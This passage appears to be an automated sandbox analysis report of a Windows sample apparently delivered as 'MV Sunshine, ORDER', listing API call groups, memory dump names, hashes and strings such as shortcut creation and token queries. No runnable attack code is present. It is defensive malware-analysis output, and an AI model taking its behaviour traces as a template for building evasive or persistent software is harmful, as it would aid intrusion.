                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,009F1184,00000000), ref: 00A0B4D0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$Long$MetricsSystem
                      • String ID:
                      • API String ID: 2294984445-0
                      • Opcode ID: 721ec18361fb1cefdf6e40878a017190afeec06d65a14382e1ebe80feb813635
                      • Instruction ID: 70854034e526b792e8a21e4b030e5312ad791b5eb3a4c0739b1ad1fa3b8cbb9c
                      • Opcode Fuzzy Hash: 721ec18361fb1cefdf6e40878a017190afeec06d65a14382e1ebe80feb813635
                      • Instruction Fuzzy Hash: 8221A671920259AFCB20DF78ED44A6937A4FB05720F114734F926D31E1E7329911DBA0
                      APIs
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009D9802
                        • Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D9834
                      • __itow.LIBCMT ref: 009D984C
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D9874
                      • __itow.LIBCMT ref: 009D9885
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$__itow$_memmove
                      • String ID:
                      • API String ID: 2983881199-0
                      • Opcode ID: 333d94bb8fc343c44d6316da488379f46c52f51879864f0effd943b2b2acc23a
                      • Instruction ID: 730247c2eeed906ae6e5eb564dee0a507ba06f979e2cc671971be9f23d2f4fb7
                      • Opcode Fuzzy Hash: 333d94bb8fc343c44d6316da488379f46c52f51879864f0effd943b2b2acc23a
                      • Instruction Fuzzy Hash: 6421FB31B40208BFDB10BAA18C86FAE7BACEF4AB14F048025F905E7391D670CD4297D1
                      APIs
                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0098134D
                      • SelectObject.GDI32(?,00000000), ref: 0098135C
                      • BeginPath.GDI32(?), ref: 00981373
                      • SelectObject.GDI32(?,00000000), ref: 0098139C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ObjectSelect$BeginCreatePath
                      • String ID:
                      • API String ID: 3225163088-0
                      • Opcode ID: b50176ced340503cc75f99bdd59012cd22a3bc8eef28b562060fbc6a8e3bdc15
                      • Instruction ID: 9ab0f2c70d65bb7149ed0097f72ef6b71948a953adf489f239ad5f36dcda0586
                      • Opcode Fuzzy Hash: b50176ced340503cc75f99bdd59012cd22a3bc8eef28b562060fbc6a8e3bdc15
                      • Instruction Fuzzy Hash: 16212478800308DFDB11DFA5DD047A97BBDFB52322F144227F414A66A0D7729993DB91
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memcmp
                      • String ID:
                      • API String ID: 2931989736-0
                      • Opcode ID: d6c4d0b734de0e16fcfb5893d4e89fa1b9b1c90f57ee80b0fefac9491a3f10ae
                      • Instruction ID: d08fddcc17b9db179457f3845db2547b809fc593608a13bb629123a917f5d07d
                      • Opcode Fuzzy Hash: d6c4d0b734de0e16fcfb5893d4e89fa1b9b1c90f57ee80b0fefac9491a3f10ae
                      • Instruction Fuzzy Hash: CD01B5F168C2277BE204A6219C42FEB735CAF62394F048522FD04E6383E661DE21C3E0
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 009E4D5C
                      • __beginthreadex.LIBCMT ref: 009E4D7A
                      • MessageBoxW.USER32(?,?,?,?), ref: 009E4D8F
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009E4DA5
                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009E4DAC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                      • String ID:
                      • API String ID: 3824534824-0
                      • Opcode ID: 57458c69422280ab991244f1bf506de329393965fa78e190e15fc93a50a860f1
                      • Instruction ID: 0bd71f071f8d3cd0fc1760a6909ec774b8e763d7dba5f1d1ff2e3ea199ae3847
                      • Opcode Fuzzy Hash: 57458c69422280ab991244f1bf506de329393965fa78e190e15fc93a50a860f1
                      • Instruction Fuzzy Hash: 7311087AD04248BFC711DFE99C08ADA7FACEB86321F144365F914D3290D6B58D4687A1
                      APIs
                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D8766
                      • GetLastError.KERNEL32(?,009D822A,?,?,?), ref: 009D8770
                      • GetProcessHeap.KERNEL32(00000008,?,?,009D822A,?,?,?), ref: 009D877F
                      • HeapAlloc.KERNEL32(00000000,?,009D822A,?,?,?), ref: 009D8786
                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D879D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 842720411-0
                      • Opcode ID: 387c407d43aac1afe2ea9a6921995d018f8a9cbe2cacd0f70f85ff012f65ef8c
                      • Instruction ID: b825df4944a72399af57a4fd731a4fed033dc1a24dcf5906c7b14739da1ae384
                      • Opcode Fuzzy Hash: 387c407d43aac1afe2ea9a6921995d018f8a9cbe2cacd0f70f85ff012f65ef8c
                      • Instruction Fuzzy Hash: 8C016271640208FFDB208FA5DC88D677B6CFF89355B204539F949E2260DA319C02CA60
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E5502
                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009E5510
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E5518
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009E5522
                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E555E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: PerformanceQuery$CounterSleep$Frequency
                      • String ID:
                      • API String ID: 2833360925-0
                      • Opcode ID: 89dcf91125e55d5d9ec399d6a0c91d1599f2b7e9e5ee6393955d868f809223bc
                      • Instruction ID: e2d9dfe5d39f8fd109df9767f116de2bdc2649736594aeade2fbded214f2f945
                      • Opcode Fuzzy Hash: 89dcf91125e55d5d9ec399d6a0c91d1599f2b7e9e5ee6393955d868f809223bc
                      • Instruction Fuzzy Hash: E3015B71D00A1DDBCF10DFE9E8886EDBB79BB09715F410556E901B2540DF309951CBA1
                      APIs
                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?,?,009D799D), ref: 009D766F
                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?), ref: 009D768A
                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?), ref: 009D7698
                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?), ref: 009D76A8
                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D758C,80070057,?,?), ref: 009D76B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: From$Prog$FreeStringTasklstrcmpi
                      • String ID:
                      • API String ID: 3897988419-0
                      • Opcode ID: 5d8d43c1f2ec00aeacef84b76ffffba71c3b7df58c0f5f5bcda2f512eb8fcc65
                      • Instruction ID: df4afcce6c200828e5ff565bc3cf4d0df92b284da73c57c0c9e1aa72ce4116b5
                      • Opcode Fuzzy Hash: 5d8d43c1f2ec00aeacef84b76ffffba71c3b7df58c0f5f5bcda2f512eb8fcc65
                      • Instruction Fuzzy Hash: A8018472601608BFDB209F98DC44BAABBADEB44751F54802AFD04E2311F731DD42D7A1
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009D8608
                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009D8612
                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009D8621
                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009D8628
                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009D863E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 76ecbafbf2d5e49caadbfa3bd9ed2b8659158ce9ce615c5c8026372b4518276f
                      • Instruction ID: f944e4edb654d21e31cbee83d0dec866d07b962067408becf7c13365f3defc55
                      • Opcode Fuzzy Hash: 76ecbafbf2d5e49caadbfa3bd9ed2b8659158ce9ce615c5c8026372b4518276f
                      • Instruction Fuzzy Hash: 08F04F31245308AFEB204FE9DC89E6B3BACEF89764B408526FA45D7251DB61DC42DA60
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009D8669
                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009D8673
                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8682
                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8689
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D869F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 0753f1c14b1366bd7b5920726a93f66437c69b5bb7e743ac3e4655c05230e99d
                      • Instruction ID: 7ec1532e03690287c77e2dc17dbb97eb5829e5825170429a90374607a931ca9c
                      • Opcode Fuzzy Hash: 0753f1c14b1366bd7b5920726a93f66437c69b5bb7e743ac3e4655c05230e99d
                      • Instruction Fuzzy Hash: 13F0C270240308BFEB215FA4EC88E673BACEF89764B504036FA05E7251DB70DC02DA60
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 009DC6BA
                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 009DC6D1
                      • MessageBeep.USER32(00000000), ref: 009DC6E9
                      • KillTimer.USER32(?,0000040A), ref: 009DC705
                      • EndDialog.USER32(?,00000001), ref: 009DC71F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                      • String ID:
                      • API String ID: 3741023627-0
                      • Opcode ID: 9d36ab0fb4b123e0ef2eeb879dc64ab4856de41df7fe1c2b6e4cb41c724de16d
                      • Instruction ID: 7c6219e8cabb05cbef504ed4ec228e040abfdba90abc55b14223b9ff7b48bc29
                      • Opcode Fuzzy Hash: 9d36ab0fb4b123e0ef2eeb879dc64ab4856de41df7fe1c2b6e4cb41c724de16d
                      • Instruction Fuzzy Hash: 3F01A270440309ABEB319B60DD4EF96B7B8FF00705F04466AF582B15E0DBE5A956CF80
                      APIs
                      • EndPath.GDI32(?), ref: 009813BF
                      • StrokeAndFillPath.GDI32(?,?,009BBAD8,00000000,?), ref: 009813DB
                      • SelectObject.GDI32(?,00000000), ref: 009813EE
                      • DeleteObject.GDI32 ref: 00981401
                      • StrokePath.GDI32(?), ref: 0098141C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Path$ObjectStroke$DeleteFillSelect
                      • String ID:
                      • API String ID: 2625713937-0
                      • Opcode ID: d50e992db5e2e083e8a4271f674114c34aa2423f709f5609051b7bc321883459
                      • Instruction ID: 90b43e4eafd29770315f3e141b4f1072a7bf2c7a69c50b5e19ffbe6353ab80ce
                      • Opcode Fuzzy Hash: d50e992db5e2e083e8a4271f674114c34aa2423f709f5609051b7bc321883459
                      • Instruction Fuzzy Hash: 88F0C97800430CEFDB26EFA6EC0C7583BA8A742326F04C225E429559F1D7368997DF51
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 009EC69D
                      • CoCreateInstance.OLE32(00A12D6C,00000000,00000001,00A12BDC,?), ref: 009EC6B5
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                      • CoUninitialize.OLE32 ref: 009EC922
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_memmove
                      • String ID: .lnk
                      • API String ID: 2683427295-24824748
                      • Opcode ID: 446f0eeb40c7abb5ca93a305ae0c3abde9653f029f66f9817573bd1868510634
                      • Instruction ID: ea00edc9d180084912f542e7340e9d1c167eea8b4908c6877a01fb18052c6ed7
                      • Opcode Fuzzy Hash: 446f0eeb40c7abb5ca93a305ae0c3abde9653f029f66f9817573bd1868510634
                      • Instruction Fuzzy Hash: F5A11971108205AFD704EF64C881EABB7E8FF94704F04495DF196972A2EB71EA49CB52
                      APIs
                        • Part of subcall function 009A0FF6: std::exception::exception.LIBCMT ref: 009A102C
                        • Part of subcall function 009A0FF6: __CxxThrowException@8.LIBCMT ref: 009A1041
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                        • Part of subcall function 00987BB1: _memmove.LIBCMT ref: 00987C0B
                      • __swprintf.LIBCMT ref: 0099302D
                      Strings
                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00992EC6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                      • API String ID: 1943609520-557222456
                      • Opcode ID: 6ed6cbc5ef72a362555acd49bcee08fd34c9385045233b28f2f3b9136842e017
                      • Instruction ID: 827283c4049878ad61e8b5c377bc07dafc4d55c836e526ca31118fcd2b0c20ce
                      • Opcode Fuzzy Hash: 6ed6cbc5ef72a362555acd49bcee08fd34c9385045233b28f2f3b9136842e017
                      • Instruction Fuzzy Hash: 3F916C715083019FCB18FF68D885E6EB7A8EF85740F14491DF496972A1DB60EE44CB92
                      APIs
                        • Part of subcall function 009848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009848A1,?,?,009837C0,?), ref: 009848CE
                      • CoInitialize.OLE32(00000000), ref: 009EBC26
                      • CoCreateInstance.OLE32(00A12D6C,00000000,00000001,00A12BDC,?), ref: 009EBC3F
                      • CoUninitialize.OLE32 ref: 009EBC5C
                        • Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
                        • Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                      • String ID: .lnk
                      • API String ID: 2126378814-24824748
                      • Opcode ID: 06c9f5cdb01d596130d0cb8f3fc05847e8f5f3321fc2b123e7e49f0c0177dab9
                      • Instruction ID: 7c2cd56993ad8147f36c279b5d15c356ab5abfdb12de994754288cadcf493201
                      • Opcode Fuzzy Hash: 06c9f5cdb01d596130d0cb8f3fc05847e8f5f3321fc2b123e7e49f0c0177dab9
                      • Instruction Fuzzy Hash: 7DA178752043419FCB11EF15C884E6ABBE5FF88314F148998F89A9B3A1CB31ED45CB91
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 009A52DD
                        • Part of subcall function 009B0340: __87except.LIBCMT ref: 009B037B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ErrorHandling__87except__start
                      • String ID: pow
                      • API String ID: 2905807303-2276729525
                      • Opcode ID: 7c9552d5afcb5cc29e5b5aa890267391c9bc9b728ed659d189b88e4fa00c659b
                      • Instruction ID: 9c5dab74eb79ca83b67b6bf5ec6c8ad0490d332b91087ffa7b751ed55544a666
                      • Opcode Fuzzy Hash: 7c9552d5afcb5cc29e5b5aa890267391c9bc9b728ed659d189b88e4fa00c659b
                      • Instruction Fuzzy Hash: F1512961B0DA0197CB11B714CB413EF2BD89BC2760F218D68E495862E9EF788CD59AC6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID: #$+
                      • API String ID: 0-2552117581
                      • Opcode ID: 16edde59c956fb80ae0de299c73edfac2435b009ccc3db7043447b3cbe1b7324
                      • Instruction ID: ff380f3fd898f8b76e69946b0c2bdaae2a0a79f38f8e45e2d73dbd6ceedffdb4
                      • Opcode Fuzzy Hash: 16edde59c956fb80ae0de299c73edfac2435b009ccc3db7043447b3cbe1b7324
